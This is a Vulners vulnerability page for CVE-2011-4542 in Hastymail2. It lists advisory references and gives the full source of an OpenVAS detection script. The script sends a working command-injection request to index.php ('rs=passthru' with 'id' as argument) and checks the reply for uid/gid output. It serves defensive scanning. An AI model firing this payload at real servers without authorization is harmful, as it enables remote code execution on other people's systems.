| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Hastymail 2.1.1 RC1 Command Injection | 12 Jul 201200:00 | – | zdt | |
| CVE-2011-4542 | 12 Jul 201200:00 | – | circl | |
| Hastymail2 call_user_func_array() Command Injection (CVE-2011-4542) | 23 Oct 201400:00 | – | checkpoint_advisories | |
| CVE-2011-4542 | 30 Nov 201102:00 | – | cve | |
| CVE-2011-4542 | 30 Nov 201102:00 | – | cvelist | |
| Hastymail 2.1.1 RC1 - Command Injection (Metasploit) | 12 Jul 201200:00 | – | exploitdb | |
| Hastymail 2.1.1 RC1 Command Injection | 10 Jul 201216:40 | – | metasploit | |
| CVE-2011-4542 | 30 Nov 201104:05 | – | nvd | |
| Hastymail < 2.1.1 RC2 RCE Vulnerability | 25 Nov 201100:00 | – | openvas | |
| Hastymail 2.1.1 RC1 Command Injection | 13 Jul 201200:00 | – | packetstorm |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/50791 |
| dognaedis | www.dognaedis.com/vulns/DGS-SEC-3.html |
| dognaedis | www.dognaedis.com/vulns/pdf/DGS-SEC-3.pdf |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_hastymail2_rs_param_remote_code_inj_vuln.nasl 7006 2017-08-25 11:51:20Z teissa $
#
# Hastymail 'rs' and 'rsargs[]' Parameters Remote Code Injection Vulnerabilities
#
# Authors:
# Sooraj KS <[email protected]>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow remote attackers to inject and execute
arbitrary malicious code with the privileges of the user running the
application.
Impact Level: Application/System";
tag_affected = "Hastymail2 version 2.1.1";
tag_insight = "The flaw is due to improper validation of user-supplied input via
the 'rs' and 'rsargs[]' parameters to index.php (when 'page' is set to
'mailbox' and 'mailbox' is set to 'Drafts'), which allows attackers to
execute arbitrary code in the context of an affected site.";
tag_solution = "Upgrade to Hastymail2 version 2.1.1 RC2 or later,
For updates refer to http://www.hastymail.org/downloads/";
tag_summary = "The host is running Hastymail2 and is prone to remote code
injection vulnerabilities.";
if(description)
{
script_id(902591);
script_version("$Revision: 7006 $");
script_cve_id("CVE-2011-4542");
script_bugtraq_id(50791);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"$Date: 2017-08-25 13:51:20 +0200 (Fri, 25 Aug 2017) $");
script_tag(name:"creation_date", value:"2011-11-25 12:12:12 +0530 (Fri, 25 Nov 2011)");
script_name("Hastymail 'rs' and 'rsargs[]' Parameters Remote Code Injection Vulnerabilities");
script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/50791");
script_xref(name : "URL" , value : "https://www.dognaedis.com/vulns/DGS-SEC-3.html");
script_xref(name : "URL" , value : "https://www.dognaedis.com/vulns/pdf/DGS-SEC-3.pdf");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2011 SecPod");
script_family("Web application abuses");
script_dependencies("gb_hastymail2_detect.nasl");
script_require_ports("Services/www", 80);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("http_func.inc");
include("version_func.inc");
include("http_keepalive.inc");
## Get HTTP Port
port = get_http_port(default:80);
## Check Port State
if(!get_port_state(port)) {
exit(0);
}
## Check Host Supports PHP
if(!can_host_php(port:port)){
exit(0);
}
## Get Hastymail2 Location
if(!dir = get_dir_from_kb(port:port, app:"Hastymail2")){
exit(0);
}
## Construct Attack Request
url = dir + "/index.php?page=mailbox&mailbox=Drafts";
postData = "rs=passthru&rsargs[]=asd&rsargs[]=id";
req = string("POST ", url, " HTTP/1.1\r\n",
"Host: ", get_host_name(), "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(postData), "\r\n",
"\r\n", postData);
## Send exploit and receive response
res = http_keepalive_send_recv(port:port, data:req);
## Check 'id' command worked properly or not
if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:res)){
security_message(port);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation